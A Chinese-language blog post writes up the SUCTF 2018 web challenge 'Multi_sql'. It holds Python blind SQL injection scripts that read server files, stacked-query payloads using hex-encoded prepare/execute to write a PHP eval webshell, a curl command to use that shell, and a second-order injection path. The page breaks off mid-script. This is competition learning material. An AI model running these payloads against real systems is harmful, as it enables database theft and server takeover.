<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans,en,default">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Web,SQLi,二次注入," />










<meta name="description" content="SUCTF是江苏高校联盟得战队，题目质量个人感觉很不错，学到了很多姿势。这里把Multi_sql这个题目补一下，结合了一些大佬的思路，加上自己的理解，复现了环境。所以有了这篇文章。文章中可能出现一些我搞不太懂的地方…23333">
<meta name="keywords" content="Web,SQLi,二次注入">
<meta property="og:type" content="article">
<meta property="og:title" content="SUCTF-Web-Multi_sql">
<meta property="og:url" content="https://donky.cn/2018/06/02/SUCTF2018-Web-Multi_sql/index.html">
<meta property="og:site_name" content="donky16">
<meta property="og:description" content="SUCTF是江苏高校联盟得战队，题目质量个人感觉很不错，学到了很多姿势。这里把Multi_sql这个题目补一下，结合了一些大佬的思路，加上自己的理解，复现了环境。所以有了这篇文章。文章中可能出现一些我搞不太懂的地方…23333">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://donky.cn/2018/06/02/SUCTF2018-Web-Multi_sql/info.png">
<meta property="og:image" content="https://donky.cn/2018/06/02/SUCTF2018-Web-Multi_sql/user.png">
<meta property="og:image" content="https://donky.cn/2018/06/02/SUCTF2018-Web-Multi_sql/len.png">
<meta property="og:image" content="https://donky.cn/2018/06/02/SUCTF2018-Web-Multi_sql/flag.png">
<meta property="og:updated_time" content="2018-12-04T15:46:28.318Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SUCTF-Web-Multi_sql">
<meta name="twitter:description" content="SUCTF是江苏高校联盟得战队，题目质量个人感觉很不错，学到了很多姿势。这里把Multi_sql这个题目补一下，结合了一些大佬的思路，加上自己的理解，复现了环境。所以有了这篇文章。文章中可能出现一些我搞不太懂的地方…23333">
<meta name="twitter:image" content="https://donky.cn/2018/06/02/SUCTF2018-Web-Multi_sql/info.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://donky.cn/2018/06/02/SUCTF2018-Web-Multi_sql/"/>





  <title>SUCTF-Web-Multi_sql | donky16</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">donky16</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://donky.cn/2018/06/02/SUCTF2018-Web-Multi_sql/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="donky16">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="donky16">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SUCTF-Web-Multi_sql</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-06-02T10:29:36+08:00">
                2018-06-02
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2018/06/02/SUCTF2018-Web-Multi_sql/" class="leancloud_visitors" data-flag-title="SUCTF-Web-Multi_sql">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>SUCTF是江苏高校联盟得战队，题目质量个人感觉很不错，学到了很多姿势。这里把Multi_sql这个题目补一下，结合了一些大佬的思路，加上自己的理解，复现了环境。所以有了这篇文章。文章中可能出现一些我搞不太懂的地方…23333<a id="more"></a>  </p>
<h2 id="题目描述"><a href="#题目描述" class="headerlink" title="题目描述"></a>题目描述</h2><blockquote>
<p>hint:Get Shell  </p>
</blockquote>
<p>首先有一个登陆和注册的链接，接着注册后，直接登陆，可以查询信息<br><img src="info.png" alt="info"></p>
<h2 id="解题思想"><a href="#解题思想" class="headerlink" title="解题思想"></a>解题思想</h2><p>用户名密码中的引号都被转义，并且将一些注入用的<code>and,union,select,substr,order,where,&amp;</code>等等转成了<code>@@</code>，一开始大佬说利用<code>@@</code>，看样子是不行。<br>登陆后点击用户信息(<code>http://39.107.124.151:1002/user/user.php?id=3</code>)，id可能有注入</p>
<h3 id="预期解法"><a href="#预期解法" class="headerlink" title="预期解法"></a>预期解法</h3><p>尝试了一下id注入<code>http://39.107.124.151:1002/user/user.php?id=1*ascii(mid(user(),1,1))</code></p>
<p>发用户信息的id变为了115，说明id存在注入(测试环境，需要脚本生成大量用户进行测试<code>register_users.py</code>)，接着使用<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"></span><br><span class="line">sqli_url = <span class="string">'http://39.107.124.151:1002/user/user.php'</span></span><br><span class="line">cookies = &#123;<span class="string">'PHPSESSID'</span> : <span class="string">'ln90ifav9t7gb4gitvib7dkee4'</span>&#125;</span><br><span class="line">result = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">100</span>):</span><br><span class="line">    <span class="comment"># payload = "1*ascii(mid(user(),%d,1))" % (i+1) # 盲注 user</span></span><br><span class="line">    <span class="comment"># payload = "1*ascii(mid(database(),%d,1))" % (i+1) # 盲注 databse</span></span><br><span class="line">    payload = <span class="string">"1*ascii(mid(@@secure_file_priv,%d,1))"</span> % (i+<span class="number">1</span>)</span><br><span class="line">    params = &#123;<span class="string">'id'</span>: payload&#125;</span><br><span class="line">    r = requests.get(sqli_url, cookies = cookies, params = params)</span><br><span class="line"></span><br><span class="line">    soup = BeautifulSoup(r.text, <span class="string">'html.parser'</span>)</span><br><span class="line">    <span class="comment"># print(soup)</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        user_id_tag = soup.find_all(<span class="string">"h1"</span>)</span><br><span class="line">        user_id = (user_id_tag[<span class="number">0</span>].contents)[<span class="number">0</span>].split(<span class="string">':'</span>)[<span class="number">1</span>]</span><br><span class="line">        w = chr(int(user_id))</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">    result += w</span><br><span class="line">    print(<span class="string">'[+] result:'</span> + result)</span><br><span class="line"></span><br><span class="line">print(<span class="string">'[+] result:'</span> + result)</span><br></pre></td></tr></table></figure></p>
<p>盲注到 user:suctf database:ctf secure_file_priv:/var/www/<br><strong>对于用户读写文件，如果mysql使用的root用户，那么肯定可以读写。但是如果设置了–secure-file-priv，那么root用户也只能访问@@secure-file-priv所制定的目录下。temp是所有用户都能访问的目录，倘若出现文件包含而且用户不是root，可以将webshell写入到tmp/下</strong><br>我们得到了secure_file_priv，接着尝试直接读出文件user.php查看id注入点的实现<br><strong>由于引号都被转义，像php中让汉字取反直接获得字符一样，我们将文件名直接变成16进制，这样就能绕过引号的转义</strong></p>
<blockquote>
<p>python3   hex_str = ‘0x’ + str(binascii.hexlify(b’/var/www/html/user/user.php’), ‘ascii’)</p>
</blockquote>
<p><strong>sql读文件 select load_file(‘c:/boot.ini’) &nbsp;&nbsp; select load_file(0x633a2f626f6f742e696e69)</strong><br><strong>sql写文件 select 0x313233 into outfile ‘D:/1.txt’ &nbsp;&nbsp; select 0x313233 into dumpfile ‘D:/1.txt’</strong><br>使用read_file.py 获得user.php<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#/usr/bin/pyton3</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"></span><br><span class="line">url = <span class="string">'http://39.107.124.151:1002'</span></span><br><span class="line">login_url = <span class="string">'http://39.107.124.151:1002/user/logCheck.php'</span></span><br><span class="line">sqli_url = <span class="string">'http://39.107.124.151:1002/user/user.php'</span></span><br><span class="line"></span><br><span class="line">file_name = <span class="string">b'/var/www/html/user/user.php'</span></span><br><span class="line">hex_str = <span class="string">'0x'</span> + str(binascii.hexlify(file_name), <span class="string">'ascii'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span><span class="params">()</span>:</span>        </span><br><span class="line">    r = requests.get(url)</span><br><span class="line">    cookies = r.cookies         <span class="comment"># 先访问网页获得cookie</span></span><br><span class="line">    username = <span class="string">'a'</span>;</span><br><span class="line">    pw = <span class="string">'a'</span>;</span><br><span class="line">    data = &#123;</span><br><span class="line">                <span class="string">'user'</span> : username,</span><br><span class="line">                <span class="string">'pass'</span> : pw,</span><br><span class="line">                <span class="string">'submit'</span> : <span class="string">'submit'</span></span><br><span class="line">            &#125;</span><br><span class="line">    r = requests.post(login_url, data = data, cookies = cookies)    <span class="comment"># 登陆需要带着cookie </span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">'你好'</span> <span class="keyword">in</span> r.text:</span><br><span class="line">        print(<span class="string">'[+] login success'</span>)</span><br><span class="line">        <span class="keyword">return</span> cookies</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        print(<span class="string">'[-] login failure'</span>)</span><br><span class="line">        exit()</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">exp_test</span><span class="params">()</span>:</span></span><br><span class="line">    cookies = login()</span><br><span class="line">    <span class="comment"># print(cookies)</span></span><br><span class="line">    </span><br><span class="line">    payload = <span class="string">'1*ascii(mid((load_file('</span>+ hex_str + <span class="string">')),1,1))'</span></span><br><span class="line">    params = &#123;<span class="string">'id'</span>: payload&#125;</span><br><span class="line">    r = requests.get(sqli_url, cookies = cookies, params = params)</span><br><span class="line"></span><br><span class="line">    soup = BeautifulSoup(r.text, <span class="string">'html.parser'</span>)</span><br><span class="line">    user_id_tag = soup.find_all(<span class="string">"h1"</span>)</span><br><span class="line">    user_id = (user_id_tag[<span class="number">0</span>].contents)[<span class="number">0</span>].split(<span class="string">':'</span>)[<span class="number">1</span>]</span><br><span class="line">    print(user_id_tag[<span class="number">0</span>].contents)</span><br><span class="line">    w = chr(int(user_id))</span><br><span class="line">    print(w)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">exp</span><span class="params">()</span>:</span></span><br><span class="line">    cookies = login()   <span class="comment"># 登陆获得cookie</span></span><br><span class="line"></span><br><span class="line">    result = <span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">100000</span>):</span><br><span class="line">        payload = <span class="string">'1*ascii(mid((load_file('</span> + hex_str + <span class="string">')),%d,1))'</span> % (i+<span class="number">1</span>)</span><br><span class="line">        params = &#123;<span class="string">'id'</span>: payload&#125;</span><br><span class="line">        r = requests.get(sqli_url, cookies = cookies, params = params)</span><br><span class="line"></span><br><span class="line">        soup = BeautifulSoup(r.text, <span class="string">'html.parser'</span>)</span><br><span class="line">        user_id_tag = soup.find_all(<span class="string">"h1"</span>)   <span class="comment"># 获得的tag是list</span></span><br><span class="line">        user_id_content = (user_id_tag[<span class="number">0</span>].contents)[<span class="number">0</span>].split(<span class="string">':'</span>)   <span class="comment"># tag的contents也是list</span></span><br><span class="line">        <span class="keyword">if</span> user_id_content[<span class="number">1</span>] != <span class="string">''</span>:    </span><br><span class="line">            w = chr(int(user_id_content[<span class="number">1</span>]))</span><br><span class="line">            result += w </span><br><span class="line">            print(result)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">exp()</span><br></pre></td></tr></table></figure></p>
<p>获得user.php，审计一波发现使用了<code>mysqli_multi_query</code>函数，可以多语句执行，这样我们在<code>id</code>出直接多语句注入就行<br><img src="user.png" alt=""><br><strong>select被过滤，而我们需要写文件，需要用到select进行写入，一种直接在select后加要写入的数据，另一种select后是从数据库中查的数据写到文件。</strong><br><strong>多语句查询，可以使用<code>prepare statement</code>(<a href="https://dev.mysql.com/doc/refman/8.0/en/sql-syntax-prepared-statements.html" target="_blank" rel="noopener">Mysql Prepare</a>)</strong></p>
<blockquote>
<p>MariaDB [(none)]&gt; prepare p from ‘select user()’; execute p;<br>Query OK, 0 rows affected (0.00 sec)<br>Statement prepared<br>+—————–+<br>| user()          |<br>+—————–+<br>| suctf@localhost |<br>+—————–+<br>1 row in set (0.00 sec)  </p>
</blockquote>
<p><strong>由于不能使用引号，可以使用mysql的变量，并将变量转化为16进制绕过，也可以使用char()函数绕过</strong></p>
<blockquote>
<p>// hex(‘select user()’) = 0x73656c65637420757365722829<br>MariaDB [(none)]&gt; set @a = 0x73656c65637420757365722829; prepare p from @a; execute p;<br>Query OK, 0 rows affected (0.00 sec)<br>Query OK, 0 rows affected (0.00 sec)<br>Statement prepared<br>+—————–+<br>| user()          |<br>+—————–+<br>| suctf@localhost |<br>+—————–+<br>1 row in set (0.00 sec)  </p>
</blockquote>
<p>接着直接写shell <strong>写shell的时候要注意，可能在/var/www/html/下有一些目录不能写，这时我们应换目录写，多注意存放图片或者js，css的目录</strong><br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"> // hex("<span class="keyword">select</span> <span class="string">'&lt;?php eval($_POST[1]);?&gt;'</span> <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">'/var/www/html/favicon/1.php'</span><span class="string">")= 0x73656c65637420273c3f706870206576616c28245f504f53545b315d293b3f3e2720696e746f206f757466696c6520272f7661722f7777772f68746d6c2f66617669636f6e2f312e70687027</span></span><br><span class="line"><span class="string">set @a = 0x73656c65637420273c3f706870206576616c28245f504f53545b315d293b3f3e2720696e746f206f757466696c6520272f7661722f7777772f68746d6c2f66617669636f6e2f312e70687027; prepare p from @a; execute p;</span></span><br></pre></td></tr></table></figure></p>
<p>访问<code>http://39.107.124.151:1002/user/user.php/?id=1;set @a = 0x73656c65637420273c3f706870206576616c28245f504f53545b315d293b3f3e2720696e746f206f757466696c6520272f7661722f7777772f68746d6c2f66617669636f6e2f312e70687027; prepare p from @a; execute p;</code>上传hell。</p>
<p>也可以访问<code>http://web.suctf.asuri.org:85/user/user.php?id=22727;set @s=CHAR(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,98,100,119,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,109,121,115,104,101,108,108,46,112,104,112,39,59);prepare p from @s;execute p;</code></p>
<p>接着连接shell</p>
<blockquote>
<p>$ curl <a href="http://39.107.124.151:1002/favicon/1.php" target="_blank" rel="noopener">http://39.107.124.151:1002/favicon/1.php</a> -d “1=echo ‘test’;”<br>test</p>
</blockquote>
<h3 id="非预期解法-（二次注入）"><a href="#非预期解法-（二次注入）" class="headerlink" title="非预期解法 （二次注入）"></a>非预期解法 （二次注入）</h3><p><strong>二次注入就是，把一些脏数据转义后放到数据库，这样不会在Insert的时候发生sqli，但是很多情况下，数据库里的数据又被拿出来运用，而不加检测，从而导致二次注入</strong><br>这个题目本不因该存在二次注入，假设我们注册一个用户<code>a&#39;#</code>，传入insert语句时是<code>a\&#39;#</code>，但是放入数据库中后是<code>a&#39;#</code>。本身我们注册时，SESSIO[‘username’]就是<code>a\&#39;#</code>。然后注册后直接进行登陆，可以不进行查询。所以不会发生二次注入。<br><strong>这是我们应该测试直接登陆，而不是注册后默认登陆，直接登陆<code>a&#39;#</code>。bug可能出现在任意一个场合，即使是一样的代码</strong>  这个地方直接登陆时，就发现了二次注入我们直接登陆<code>a&#39; #</code>时，查询信息时，发现获得的info是<code>username=a</code>的info。所以应该是在直接登陆时，先是验证了用户名密码，使用select查询，接着把数据库中的<code>username</code>用作了<code>SESSION[&#39;username&#39;]</code>，查询源码<code>logCheck.php</code>发现<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">// 部分代码</span></span><br><span class="line">$sql = <span class="string">"SELECT * FROM dwvs_user_message WHERE DWVS_user_name ="</span>.<span class="string">"'"</span>.<span class="string">"$clean_name"</span>.<span class="string">"'"</span>.<span class="string">" AND DWVS_user_passwd="</span>.<span class="string">"'"</span>.md5(<span class="string">"$clean_pass"</span>).<span class="string">"'"</span>;</span><br><span class="line"></span><br><span class="line">        $data = mysqli_query($connect, $sql) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">'Mysql Error!!'</span>);</span><br><span class="line">                mysqli_close($connect);</span><br><span class="line">                <span class="keyword">if</span>(mysqli_num_rows($data) == <span class="number">1</span>)</span><br><span class="line">                &#123;</span><br><span class="line">                         $row = mysqli_fetch_array($data);</span><br><span class="line">                          $_SESSION[<span class="string">'user_id'</span>] = $row[<span class="string">'DWVS_user_id'</span>];</span><br><span class="line">                                  $_SESSION[<span class="string">'user_name'</span>] = $row[<span class="string">'DWVS_user_name'</span>];      <span class="comment">//将查询的数据库中的username用作sesson中的name </span></span><br><span class="line">                                  <span class="keyword">if</span>(!<span class="keyword">empty</span>($row[<span class="string">'DWVS_user_favicon'</span>]))</span><br><span class="line">                                  &#123;</span><br><span class="line">                                        $_SESSION[<span class="string">'user_favicon'</span>] = $row[<span class="string">'DWVS_user_favicon'</span>];</span><br><span class="line">                                  &#125;<span class="keyword">else</span></span><br><span class="line">                                  &#123;</span><br><span class="line">                                        $rand_num = rand(<span class="number">1</span>,<span class="number">4</span>);</span><br><span class="line">                                        $user_favicon = <span class="string">"../favicon/"</span>.<span class="string">"$rand_num"</span>.<span class="string">".jpg"</span>;</span><br><span class="line">                                        $_SESSION[<span class="string">'user_favicon'</span>] = $user_favicon;</span><br><span class="line">                                  &#125;</span><br><span class="line">                                header(<span class="string">'Location: user.php'</span>);</span><br><span class="line">                &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">                                $_SESSION[<span class="string">'login_error'</span>] = <span class="string">'Error'</span>;</span><br><span class="line">                                header(<span class="string">'Location: login.php'</span>);</span><br><span class="line">                                &#125;</span><br><span class="line">                &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">                                $_SESSION[<span class="string">'login_error'</span>] = <span class="string">'Error'</span>;</span><br><span class="line">                                header(<span class="string">'Location: login.php'</span>);</span><br><span class="line">                                &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>猜测功能实现:   </p>
<ul>
<li>注册时，insert自动生成id</li>
<li>登陆时，根据二次注入，SESSION[‘username’]为payload</li>
<li>根据SESSION[‘username’]查询出id，猜测 select *  from users where username = SESSION[‘username’] 可以成功利用二次注入</li>
</ul>
<p>所以可以直接通过二次注入，将写shell到服务器上，此时我们可以使用引号，而且导致二次注入的语句是select的，这样我们通过写入select的数据到文件，所以必须先注册一个用户<code>username=&lt;?php eval($_POST[2]);?&gt;</code>，接着我们注册<code>username=&lt;?php eval($_POST[2];?&gt;&#39; into outfile &#39;/var/www/html/favicon/2.php&#39;#</code>，接着直接登陆第二个账户，然后点击用户信息，查询id，从而获得<code>&lt;?php eval($_POST[2]);?&gt;</code>的信息，并写到文件中<br>但是在注册第二个账户之后，直接登陆发现登陆失败，那么shell肯定写入失败。<strong>这种情况下，会登陆失败说明username长度超过了数据库规定长度，测试脚本</strong><br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#/usr/bin/python3</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">'http://39.107.124.151:1002'</span></span><br><span class="line">r = requests.get(url)</span><br><span class="line">cookies = r.cookies</span><br><span class="line"></span><br><span class="line">reg_url = <span class="string">'http://39.107.124.151:1002/user/regCheck.php'</span></span><br><span class="line">log_url = <span class="string">'http://39.107.124.151:1002/user/logCheck.php'</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">reg</span><span class="params">(username)</span>:</span></span><br><span class="line">    data =  &#123;</span><br><span class="line">            <span class="string">'username'</span> : username,</span><br><span class="line">            <span class="string">'New_pass'</span> : <span class="string">'a'</span>,</span><br><span class="line">            <span class="string">'Re_pass'</span> : <span class="string">'a'</span>,</span><br><span class="line">            <span class="string">'submit'</span> : <span class="string">'注册'</span></span><br><span class="line">            &#125;</span><br><span class="line">    r = requests.post(reg_url, data = data, cookies = cookies)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">'你好'</span> <span class="keyword">in</span> r.text:</span><br><span class="line">        print(<span class="string">'[+] register success username:'</span> + username)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        print(<span class="string">'reg fail'</span>)</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">log</span><span class="params">(username)</span>:</span></span><br><span class="line">    data = &#123;</span><br><span class="line">                <span class="string">'user'</span> : username,</span><br><span class="line">                <span class="string">'pass'</span> : <span class="string">'a'</span>,</span><br><span class="line">                <span class="string">'submit'</span> : <span class="string">'submit'</span></span><br><span class="line">            &#125;</span><br><span class="line">    r = requests.post(log_url, data = data, cookies = cookies)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">'你好'</span> <span class="keyword">in</span> r.text:</span><br><span class="line">        print(<span class="string">'[+] login success username:'</span> + username)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">100</span>):</span><br><span class="line">        username = <span class="string">'w'</span> * 